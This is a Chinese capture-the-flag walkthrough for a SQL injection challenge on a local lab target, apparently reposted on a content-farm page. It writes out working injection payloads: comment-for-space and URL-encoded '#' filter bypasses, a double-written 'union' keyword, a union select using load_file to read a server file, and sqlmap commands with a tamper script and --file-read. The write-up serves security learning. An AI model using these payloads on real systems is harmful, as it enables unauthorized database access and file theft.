当前位置: 首页 > news >正文

黑马程序员官方网站品牌运营

黑马程序员官方网站,品牌运营,百度做网站怎么样,苏州园区网站开发url:http://192.168.154.253:81/ #打开http://XXX:81/,XXX为靶机的ip地址 审题 1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中 2、开始答题 发现这里url中有一个id的参数&#xff0…

url:http://192.168.154.253:81/  #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中

2、开始答题

发现这里url中有一个id的参数,并且给出了当前所执行的sql语句

第一步:判断注入点

1、?id=1'

2、?id=1'and'1'='1

第二步:判断语句模板

1、使用 order by 判断语句模板列数

发现语句在执行中过滤了空格还过滤了“#”

执行失败:

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

执行成功:

?id=1')and'1'='1'order/**/by/**/3%23

解释:

?id=1')and'1'='1'order/**/by/**/3%23

  • ')用来闭合前面的语句,order/**/by/**/3%23(order by 3)用来查询模板列数
  • /**/(用注释的方式代替空格),%23(使用url编码代替#

2、判断出语句模板有4个字段

回显正常:

?id=1')and'1'='1'order/**/by/**/4%23  #执行 order by 4 的时候回显正常

回显不正常:

?id=1')and'1'='1'order/**/by/**/5%23  #执行 order by 5 的时候回显不正常

第三步:找回显点

回显不正常:

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路:使用 and 1=2 报错找回显点

回显正常:

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路:由于过滤了union,所以这里使用双写的方式经行过滤绕过,并且判断出回显点有3个(语句模板中的234位置均为回显点)

第四步:拿到flag

执行成功:

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解释:

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

  • database() #当前数据库名
  • user() #当前数据库用户名
  • load_file('/tmp/360/key') #读取服务器文件

扩展:使用sqlmap一把梭哈

1、由于前面判断出了此题注入点存在过滤空格的情况,所以在使用sqlmap的时候需要指定脚本(用注释/**/替换空格字符' ':--tamper "space2comment.py")运行

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py"

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  

2、获取到flag

http://www.dt0577.cn/news/36110.html

相关文章:

  • 给自己的爱人做网站seo关键词快速排名
  • 房屋网上海做网站优化
  • 建网站视频教程app推广渠道在哪接的单子
  • 公众号里的电影网站怎么做株洲百度seo
  • 典型的b2b网站有哪些成都专门做网站的公司
  • 找人做的网站推广被坑自助建站系统哪个好
  • 人工智能公司网站建设关键词排名优化易下拉技巧
  • 注册网站后如何注销账号百度网盘app官方下载
  • 做网站策划一个专利的主题宣传网站诊断分析
  • 做网站怎么赚钱广告谷歌优化工具
  • 沈阳做网站官方网站怎么注册
  • 新闻网站开发目的与意义公司网站怎么申请怎么注册
  • 网站建设 域名 空间优化网站排名的方法
  • asp网站源码下载百度手机卫士
  • 风水公司网站建设销售找客户的app
  • 如何做微商城网站网站友情链接的作用
  • 唐山模板网站建设营销方案
  • 临沂网站开发多少钱seo人员的相关薪资
  • 广告行业网站建设方案搜索引擎优化seo怎么做
  • 做的好的营销型网站有哪些内容网络营销产品策略
  • 上海城隍庙在哪个区西安做seo的公司
  • 品牌网站设计标准软文发稿平台
  • 神华公司两学一做网站如何推广自己的店铺
  • wordpress网站价格头条新闻今日头条官方版本
  • 金华外贸网站建设域名查询备案
  • 网络知识sem优化公司
  • 如何上传自己的做的网站百度竞价推广是什么意思
  • 汕头app制作seo教程有什么
  • 经营性网站备案需要哪些材料商城网站建设
  • 个人网站建设 实验报告站长工具seo查询